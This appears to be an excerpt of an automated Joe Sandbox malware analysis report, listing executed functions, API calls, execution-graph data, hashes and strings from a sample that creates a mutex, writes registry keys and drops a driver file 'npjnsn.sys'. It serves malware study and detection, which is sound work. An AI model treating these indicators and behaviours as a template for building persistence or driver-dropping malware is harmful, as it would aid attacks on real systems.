                                                                                                                                                                                                                                    Function 00340260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2641609036.0000000000340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_340000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: ceb66df7ae4284b51411c98eb5c1b66c82f735cc70db7d343488cea4a7e1d7bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F111E31340288ABEF55DEA08D4DFD937A8AB44B01F440815BB09EE0E0DAB1A644872B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 01490005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 5100543874fe88212dd5caeb45c10a9772bdfde687200c9dc2e12094868f6133
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0614D71640289ABEF11DF60CC49FAA3B6CEF44B05F444516FE09BF2F0D6B1A6448B5A
                                                                                                                                                                                                                                    Function 014906D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 43fb5ee287046be696cc6242341ebbe34ab00377fabd72383aeeb9f03033c0e4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5B13E75A001898FEF10CF58CC44BA93BA9FF44314F484966ED0DAF3A1D375AA95CB4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 01490260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2659374662.0000000001490000.00000040.00000001.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1490000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 5e594af184c786063cfb4ccc062c4bcd518c7e9f4eec7d2473b8cd9bac6b021a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36111E71240288ABEF11DFA48D4DFEA3BACAB44B01F040415BA09EE1E0DAB19644872B

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:21%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                    Total number of Nodes:348
                                                                                                                                                                                                                                    Total number of Limit Nodes:51
                                                                                                                                                                                                                                    execution_graph 8013 28a878b 8014 28a87d7 8013->8014 8015 28a88e2 8014->8015 8017 28a5760 8014->8017 8018 28a57ec 8017->8018 8019 28a57e3 8017->8019 8018->8014 8019->8018 8021 28a5a4b 8019->8021 8025 28a585e 8019->8025 8020 28a5bf4 7686EB20 8020->8018 8022 28a5ad0 75A38400 8021->8022 8023 28a5935 8021->8023 8022->8023 8023->8018 8023->8020 8024 28a5962 75A38400 8024->8025 8025->8023 8025->8024 8260 28b2c88 8262 28b2c97 8260->8262 8261 28b2dee 8262->8261 8263 28b2ddd 75A38400 8262->8263 8263->8261 8264 28a828e 8265 28a811c 6 API calls 8264->8265 8266 28a82a3 8265->8266 8108 28a84c1 8109 28a84ce 8108->8109 8116 28a719b 8109->8116 8111 28a8651 8112 28a85f5 8112->8111 8120 28a82b6 8112->8120 8113 28a8597 8113->8111 8113->8112 8114 28a719b 6 API calls 8113->8114 8114->8112 8118 28a71a8 8116->8118 8117 28a734f 8117->8113 8118->8117 8124 28a6330 8118->8124 8122 28a831d 8120->8122 8121 28a83a2 8121->8111 8122->8121 8150 28a811c 8122->8150 8125 28a633d 8124->8125 8127 28a672a 8125->8127 8131 28a63dd 8125->8131 8126 28a6412 8126->8117 8127->8126 8128 28a678e 75A38400 8127->8128 8129 28a67bd 8128->8129 8129->8126 8130 28a68d3 75A38400 8129->8130 8130->8126 8131->8126 8133 28a4af0 8131->8133 8135 28a4afd 8133->8135 8134 28a4b5b 8134->8126 8135->8134 8136 28a4b96 75A38400 8135->8136 8137 28a4bc7 8136->8137 8137->8134 8138 28a4d68 7686EB20 8137->8138 8139 28a4c15 75A38400 8137->8139 8138->8134 8140 28a4c60 8139->8140 8145 28a4c6d 8139->8145 8141 28a4cbc 8140->8141 8142 28a4ce5 8140->8142 8140->8145 8146 28a4a5b 8141->8146 8143 28a4a5b 75A38400 8142->8143 8143->8145 8145->8126 8147 28a4a68 8146->8147 8148 28a4ae5 8147->8148 8149 28a4ad2 75A38400 8147->8149 8148->8145 8149->8147 8151 28a8167 8150->8151 8152 28a8234 8151->8152 8153 28a6330 6 API calls 8151->8153 8152->8121 8153->8152 8228 28b1e9b 8230 28b1ea9 8228->8230 8229 28b1ee8 8230->8229 8231 28b1d8f 7686EB20 8230->8231 8231->8230 8331 292d440 8332 292d760 8331->8332 8334 292d765 8332->8334 8335 292d78b 8334->8335 8339 292d778 __common_dcos_data 8334->8339 8336 292d9c0 __common_dcos_data 771B4100 8335->8336 8337 292d83c 8336->8337 8349 292d9c5 8337->8349 8340 292d7cf 771B4100 8339->8340 8345 292d9c0 8339->8345 8342 292d803 __common_dcos_data 8344 292d9c0 __common_dcos_data 771B4100 8342->8344 8344->8335 8346 292d9c4 8345->8346 8348 292d91a 771B4100 8345->8348 8346->8342 8350 292d9c9 8349->8350 8350->8349 8350->8350 8351 292d9c0 __common_dcos_data 771B4100 8350->8351 8352 292d9e5 8350->8352 8351->8350 8352->8340 8232 2937ac0 8235 2937ad8 8232->8235 8233 2937bf2 771B0BD0 8233->8235 8235->8233 8236 2937c1b 771AF550 8235->8236 8237 2937c37 771B04C0 771B04C0 8235->8237 8236->8235 8239 2937c31 771B4100 8236->8239 8238 2937c9c 8237->8238 8238->8238 8239->8237 8301 28a511e 8302 28a512d 8301->8302 8303 28a513a 75A38400 8302->8303 8307 28a5165 8302->8307 8303->8307 8304 28a5433 7686EB20 8305 28a5440 8304->8305 8306 28a5199 8307->8306 8308 28a6330 6 API calls 8307->8308 8309 28a5403 8307->8309 8308->8309 8309->8304 8309->8305 8246 28b27d4 8248 28b2807 8246->8248 8247 28b2885 8248->8247 8250 28b2514 8248->8250 8253 28b254a 8250->8253 8251 28b276d 8251->8248 8252 28b2624 8252->8251 8255 28b26fb 75A38400 8252->8255 8253->8251 8253->8252 8254 28b2602 75A38400 8253->8254 8254->8252 8255->8252 7967 28a9eea 7968 28a9ef9 7967->7968 7994 28a8f51 7968->7994 7971 28a8f51 2 API calls 7972 28a9f43 771B0BD0 7971->7972 7973 28a9f60 771AF550 7972->7973 7993 28aa078 7972->7993 7974 28a9f7e 7973->7974 7975 28a9f83 771AF550 7973->7975 7976 28a9fa2 7975->7976 7977 28a9fa7 771AF550 7975->7977 7978 28a9fcb 771AF550 7977->7978 7979 28a9fc6 7977->7979 7980 28a9fe9 7978->7980 7981 28a9fee 771AF550 7978->7981 7982 28aa00d 7981->7982 7983 28aa012 771AF550 7981->7983 7984 28aa031 7983->7984 7985 28aa036 771AF550 7983->7985 7986 28aa059 771AF550 7985->7986 7987 28aa054 7985->7987 7988 28aa07d 7986->7988 7986->7993 7989 28aa0a3 771B0BD0 7988->7989 7990 28aa0c0 771AF550 7989->7990 7989->7993 7991 28aa0de 7990->7991 7990->7993 7991->7993 8000 28a9706 7991->8000 7995 28a8fa6 7994->7995 7996 28a90b5 7995->7996 7997 28a90ab 7686EB20 7995->7997 7998 28a9052 75A38400 7995->7998 7999 28a9050 7995->7999 7996->7971 7997->7996 7998->7995 7999->7997 8001 28a9774 8000->8001 8005 28a97f6 8001->8005 8006 28aa75a 8001->8006 8004 28a98be 771AF550 8004->8005 8005->7993 8007 28aa792 8006->8007 8008 28aa7ec 75A38400 8007->8008 8009 28aa814 75A38400 8007->8009 8012 28a984d 8008->8012 8009->8012 8012->8004 8012->8005 8353 28a5a6a 8356 28a5a82 8353->8356 8354 28a5c01 8355 28a5bf4 7686EB20 8355->8354 8357 28a5ad0 75A38400 8356->8357 8358 28a5b33 8356->8358 8357->8358 8358->8354 8358->8355 8279 28a58e9 8284 28a5901 8279->8284 8280 28a5c01 8281 28a5bf4 7686EB20 8281->8280 8282 28a5962 75A38400 8282->8284 8283 28a5935 8283->8280 8283->8281 8284->8282 8284->8283 8026 28b392d 8027 28b393a 8026->8027 8028 28b3991 771B0BD0 8027->8028 8029 28b39cf 8028->8029 8030 28b39b7 771AF550 8028->8030 8031 28b3a2c 8029->8031 8033 28b39f8 771B0BD0 8029->8033 8030->8029 8041 28b377a 8031->8041 8033->8031 8034 28b3a14 771AF550 8033->8034 8034->8031 8035 28b3a31 8045 28b174a 8035->8045 8038 28b174a 2 API calls 8039 28b3b09 8038->8039 8050 28b195d 8039->8050 8042 28b3787 8041->8042 8056 28b2fff 8042->8056 8044 28b382e 8044->8035 8046 28b17df 75A38400 8045->8046 8049 28b1820 8046->8049 8047 28b192e 8047->8038 8048 28b1921 7686EB20 8048->8047 8049->8047 8049->8048 8053 28b1a00 8050->8053 8051 28b1a26 8051->8039 8052 28b195d 75A38400 8052->8051 8053->8051 8055 28b1b47 8053->8055 8059 28b0b9a 8053->8059 8055->8052 8057 28aa75a 2 API calls 8056->8057 8058 28b3015 8057->8058 8058->8044 8060 28b0bce 75A38400 8059->8060 8062 28b0c14 8060->8062 8062->8055 8063 28a8962 8067 28a8a1a 8063->8067 8064 28a8db5 8065 28aa75a 75A38400 75A38400 8065->8067 8067->8064 8067->8065 8068 28b0945 8067->8068 8069 28b09a9 8068->8069 8072 28aa677 8069->8072 8071 28b09b5 8071->8067 8074 28aa68a 8072->8074 8073 28aa757 8073->8071 8074->8073 8075 28aa70f 8074->8075 8076 28aa6c5 8074->8076 8078 28aa748 75A38400 8075->8078 8077 28aa6fe 75A38400 8076->8077 8077->8073 8078->8073 8079 28b3062 8080 28b308c 8079->8080 8081 28b2fff 2 API calls 8080->8081 8086 28b3188 8081->8086 8082 28b3744 8086->8082 8087 28b2ebc 8086->8087 8095 28aa2ad 76BE5A90 8086->8095 8097 28b2b8e 8086->8097 8088 28b2f09 8087->8088 8089 28b2f37 7686EB20 8088->8089 8091 28b2f44 8088->8091 8089->8091 8092 28b2f8b 8091->8092 8101 28b2e32 8091->8101 8093 28b2ffa 8092->8093 8094 28b2e32 2 API calls 8092->8094 8093->8086 8094->8092 8096 28aa2f0 8095->8096 8096->8086 8099 28b2c23 8097->8099 8098 28b2dee 8098->8086 8099->8098 8100 28b2ddd 75A38400 8099->8100 8100->8098 8102 28b2e58 8101->8102 8103 28b2e5c 7686EB20 8102->8103 8104 28b2e80 8102->8104 8106 28b2eb8 8103->8106 8104->8106 8107 28b2eae 7686EB20 8104->8107 8106->8091 8107->8106 8154 28b4567 8155 28b4585 8154->8155 8158 28b3b60 8155->8158 8157 28b45ba 8159 28b3b8a 8158->8159 8160 28b2ebc 3 API calls 8159->8160 8161 28b3c0d 771B0BD0 8160->8161 8162 28b3c28 771AF550 771AF550 771AF550 8161->8162 8163 28b3c72 771B0BD0 8161->8163 8162->8163 8164 28b3c8e 771AF550 771AF550 771AF550 771AF550 8163->8164 8165 28b3cf1 8163->8165 8164->8165 8166 28b3d4d 8165->8166 8167 28b3d40 7686EB20 8165->8167 8168 28b3d9c 7686EB20 8166->8168 8169 28b3da9 8166->8169 8167->8166 8168->8169 8170 28b3e08 75A38400 8169->8170 8172 28b3e5f 8169->8172 8171 28b3e32 7686EB20 8170->8171 8171->8172 8174 28b3f08 7686EB20 8172->8174 8175 28b3f15 8172->8175 8174->8175 8176 28b0b9a 75A38400 8175->8176 8177 28b40eb 8176->8177 8178 28b0b9a 75A38400 8177->8178 8179 28b4133 8177->8179 8178->8179 8180 28a5760 3 API calls 8179->8180 8181 28b4246 8180->8181 8182 28b4331 8181->8182 8187 28b4256 8181->8187 8183 28a5760 3 API calls 8182->8183 8184 28b432c 8183->8184 8197 28a4d96 8184->8197 8185 28a5760 3 API calls 8185->8184 8187->8185 8188 28b434a 8220 28a55be 8188->8220 8192 28b4366 8194 28b43b0 75A38400 8192->8194 8195 28b43c6 8192->8195 8193 28b44a3 8193->8157 8194->8195 8195->8193 8196 28b447a 75A38400 8195->8196 8196->8193 8196->8195 8198 28a4dc0 8197->8198 8199 28a4e7e 75A38400 8198->8199 8208 28a4e3c 8198->8208 8200 28a4eaf 8199->8200 8201 28a5112 8200->8201 8206 28a4eb7 8200->8206 8202 28a513a 75A38400 8201->8202 8211 28a5165 8201->8211 8202->8211 8203 28a5433 7686EB20 8203->8208 8204 28a5199 8204->8188 8205 28a4f1a 8205->8208 8209 28a4f52 75A38400 8205->8209 8210 28a5085 7686EB20 8205->8210 8206->8205 8207 28a6330 6 API calls 8206->8207 8206->8208 8207->8205 8208->8188 8212 28a4f9c 8209->8212 8218 28a4fa9 8209->8218 8210->8208 8211->8204 8216 28a6330 6 API calls 8211->8216 8219 28a5403 8211->8219 8212->8211 8213 28a5007 8212->8213 8214 28a4fe5 8212->8214 8212->8218 8217 28a4a5b 75A38400 8213->8217 8215 28a4a5b 75A38400 8214->8215 8215->8218 8216->8219 8217->8218 8218->8188 8219->8203 8219->8208 8223 28a563d 8220->8223 8221 28a5742 8221->8192 8224 28aa553 8221->8224 8222 28a6330 6 API calls 8222->8221 8223->8221 8223->8222 8226 28aa59f 8224->8226 8225 28aa660 8225->8192 8226->8225 8227 28aa613 75A38400 8226->8227 8227->8225 8359 292d760 8360 292d765 __common_dcos_data 2 API calls 8359->8360 8360->8359 8285 28a4bf9 8286 28a4c08 8285->8286 8287 28a4d68 7686EB20 8286->8287 8288 28a4c15 75A38400 8286->8288 8289 28a4d75 8287->8289 8290 28a4c60 8288->8290 8295 28a4c6d 8288->8295 8291 28a4cbc 8290->8291 8292 28a4ce5 8290->8292 8290->8295 8294 28a4a5b 75A38400 8291->8294 8293 28a4a5b 75A38400 8292->8293 8293->8295 8294->8295 8310 28b3238 8311 28b31f9 8310->8311 8312 28b3744 8311->8312 8313 28b2ebc 3 API calls 8311->8313 8314 28aa2ad 76BE5A90 8311->8314 8315 28b2b8e 75A38400 8311->8315 8313->8311 8314->8311 8315->8311 8361 28a777d 8362 28a77b5 8361->8362 8367 28a7875 8361->8367 8363 28a7824 8362->8363 8365 28a78ff 8362->8365 8362->8367 8364 28a719b 6 API calls 8363->8364 8364->8367 8366 28a6330 6 API calls 8365->8366 8365->8367 8366->8367 8267 28b1ab1 8269 28b1a5a 8267->8269 8268 28b195d 75A38400 8271 28b1c69 8268->8271 8270 28b0b9a 75A38400 8269->8270 8269->8271 8272 28b1b47 8269->8272 8270->8272 8272->8268 8296 28a8bf1 8300 28a8a39 8296->8300 8297 28a8db5 8298 28b0945 2 API calls 8298->8300 8299 28aa75a 75A38400 75A38400 8299->8300 8300->8297 8300->8298 8300->8299 8316 28a4f36 8317 28a4f45 8316->8317 8318 28a4f52 75A38400 8317->8318 8319 28a5085 7686EB20 8317->8319 8320 28a4f9c 8318->8320 8325 28a4fa9 8318->8325 8326 28a50d2 8319->8326 8321 28a5007 8320->8321 8322 28a4fe5 8320->8322 8320->8325 8328 28a5215 8320->8328 8324 28a4a5b 75A38400 8321->8324 8323 28a4a5b 75A38400 8322->8323 8323->8325 8324->8325 8327 28a5433 7686EB20 8327->8326 8329 28a6330 6 API calls 8328->8329 8330 28a5403 8328->8330 8329->8330 8330->8326 8330->8327 8256 28aa2f5 8258 28aa360 8256->8258 8257 28aa542 8258->8257 8259 28aa2ad 76BE5A90 8258->8259 8259->8258

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 028B3B60 Relevance: 40.8, APIs: 16, Strings: 7, Instructions: 599COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 28b3b60-28b3c26 call 28b8060 call 28b2ebc 771B0BD0 5 28b3c28-28b3c6d 771AF550 * 3 0->5 6 28b3c72-28b3c8c 771B0BD0 0->6 5->6 7 28b3c8e-28b3cec 771AF550 * 4 6->7 8 28b3cf1-28b3d13 6->8 7->8 10 28b3d4d-28b3d6f 8->10 11 28b3d15-28b3d47 7686EB20 8->11 14 28b3da9-28b3df2 10->14 15 28b3d71-28b3da3 7686EB20 10->15 11->10 20 28b3e5f-28b3e81 14->20 21 28b3df4-28b3e59 75A38400 7686EB20 14->21 15->14 24 28b3e87-28b3f0f 7686EB20 20->24 25 28b3f15-28b3f3a 20->25 21->20 24->25 32 28b3f4c-28b3f7a 25->32 33 28b3f3c-28b3f41 25->33 37 28b3fc9-28b4007 32->37 38 28b3f7c-28b3fc2 32->38 33->32 43 28b4009-28b4016 37->43 44 28b401d-28b403d call 28b772b 37->44 38->37 43->44 47 28b404e-28b4061 44->47 49 28b4063-28b406a 47->49 50 28b40e1-28b40f0 call 28b0b9a 47->50 49->50 52 28b406c-28b4099 49->52 56 28b414d-28b4152 50->56 57 28b40f2-28b4117 50->57 53 28b409b-28b40a4 52->53 54 28b40aa-28b40dc 52->54 53->54 54->47 60 28b415d-28b4167 56->60 65 28b4129-28b412e call 28b0b9a 57->65 66 28b4119-28b411e 57->66 62 28b4178-28b418b 60->62 67 28b418d-28b4194 62->67 68 28b4205-28b4250 call 28a477f call 28a6274 call 28a5760 call 28a5c26 62->68 70 28b4133-28b4138 65->70 66->65 67->68 71 28b4196-28b41ca 67->71 88 28b4331-28b4333 call 28a5760 68->88 89 28b4256-28b429b call 28ac89a 68->89 72 28b414b 70->72 73 28b413a-28b4140 70->73 75 28b41db-28b4200 71->75 76 28b41cc-28b41d5 71->76 72->60 73->72 75->62 76->75 93 28b4338 88->93 95 28b42ac-28b42b6 89->95 94 28b433b-28b435f call 28a8701 call 28a4d96 call 28a55be 93->94 114 28b4361 call 28aa553 94->114 115 28b4366-28b4389 94->115 97 28b42b8-28b42e7 95->97 98 28b4325-28b432f call 28a5760 95->98 100 28b42e9-28b42f7 97->100 101 28b431e 97->101 98->94 100->101 104 28b42f9-28b4320 call 28a5e86 100->104 101->98 104->95 114->115 117 28b438b-28b4395 115->117 118 28b4397-28b43c3 call 28a44cb 75A38400 115->118 117->118 119 28b43c6 117->119 118->119 121 28b43d0-28b43e0 119->121 123 28b44aa-28b44e3 121->123 124 28b43e6-28b43f6 121->124 135 28b44f5-28b4566 123->135 136 28b44e5-28b44ea 123->136 124->123 126 28b43fc-28b440b 124->126 126->123 128 28b4411-28b4447 126->128 129 28b4449-28b4455 128->129 130 28b4457 128->130 132 28b4461-28b44a1 75A38400 129->132 130->132 137 28b44a3 132->137 138 28b44a5 132->138 136->135 137->123 138->121
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 028B2EBC: 7686EB20.ADVAPI32(?), ref: 028B2F3E
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(028A2154), ref: 028B3C13
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A278C), ref: 028B3C36
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A27A0), ref: 028B3C4E
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A27B0), ref: 028B3C67
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(028A2894), ref: 028B3C79
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A28D8), ref: 028B3C9C
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A28B0), ref: 028B3CB5
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A28C4), ref: 028B3CCD
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A28A0), ref: 028B3CE6
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028B3D47
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028B3DA3
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,028A23E0,00000000), ref: 028B3E1C
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028B3E59
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028B3F0F
                                                                                                                                                                                                                                      • Part of subcall function 028B0B9A: 75A38400.USER32(?), ref: 028B0BEF
                                                                                                                                                                                                                                    • 75A38400.USER32(46390628699,028A22B4,00000000), ref: 028B43BD
                                                                                                                                                                                                                                    • 75A38400.USER32(?), ref: 028B4482
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: F550$7686$A38400
                                                                                                                                                                                                                                    • String ID: 46390628699$C:\Users\user~1\AppData\Local\Temp\mqiwauwsp.log$C:\Windows\system32\drivers\npjnsn.sys$Software\$Software\Erlloywmr$fronC:\Windows\$n
                                                                                                                                                                                                                                    • API String ID: 430827005-296377573
                                                                                                                                                                                                                                    • Opcode ID: 71fba9ced32656a28ae87eca0d6a54fb5a263805ee44f505e1b6198725dea589
                                                                                                                                                                                                                                    • Instruction ID: e87abc53f94511460dcc2c7f00c48208e6d38be26ef4538bc9ffe11f532169d9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71fba9ced32656a28ae87eca0d6a54fb5a263805ee44f505e1b6198725dea589
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F04202BCE80618DFEB25DB68DC9DBEA77B5AF48701F004598E20DE6281DB745A91CF10
                                                                                                                                                                                                                                    Function 028A9EEA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 144 28a9eea-28a9ef7 145 28a9ef9-28a9f04 144->145 146 28a9f06 144->146 147 28a9f11-28a9f5a call 28a8f51 * 2 771B0BD0 145->147 146->147 153 28aa149 147->153 154 28a9f60-28a9f7c 771AF550 147->154 157 28aa151-28aa168 153->157 155 28a9f7e 154->155 156 28a9f83-28a9fa0 771AF550 154->156 158 28a9fa2 156->158 159 28a9fa7-28a9fc4 771AF550 156->159 161 28a9fcb-28a9fe7 771AF550 159->161 162 28a9fc6 159->162 163 28a9fe9 161->163 164 28a9fee-28aa00b 771AF550 161->164 165 28aa00d 164->165 166 28aa012-28aa02f 771AF550 164->166 167 28aa031 166->167 168 28aa036-28aa052 771AF550 166->168 169 28aa059-28aa076 771AF550 168->169 170 28aa054 168->170 171 28aa078 169->171 172 28aa07d-28aa0ba call 28a92f3 call 28a41c6 771B0BD0 169->172 173 28aa155 171->173 172->153 179 28aa0c0-28aa0dc 771AF550 172->179 173->153 179->153 180 28aa0de-28aa0e5 call 28a917d 179->180 183 28aa113 call 28a917d 180->183 184 28aa0e7-28aa110 call 28a45d2 call 28a9243 180->184 188 28aa118-28aa11a 183->188 184->183 188->153 190 28aa11c-28aa123 call 28a9706 188->190 190->153 194 28aa125-28aa146 call 28a41c6 190->194 194->153
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(028A27C0), ref: 028A9F4D
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A27D0), ref: 028A9F6A
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A27E0), ref: 028A9F8E
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A27F0), ref: 028A9FB2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: F550
                                                                                                                                                                                                                                    • String ID: C:\Windows\system32\drivers\npjnsn.sys
                                                                                                                                                                                                                                    • API String ID: 963841436-2135717084
                                                                                                                                                                                                                                    • Opcode ID: 06acb5561f23f06c325fd5d83bbdbec09ef8d27588d2fb4cf60805dd2efb42eb
                                                                                                                                                                                                                                    • Instruction ID: b1b872cb29a31ffa941b21a69d3773d926aa8cf38e6740aebb9effd5e6d65541
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06acb5561f23f06c325fd5d83bbdbec09ef8d27588d2fb4cf60805dd2efb42eb
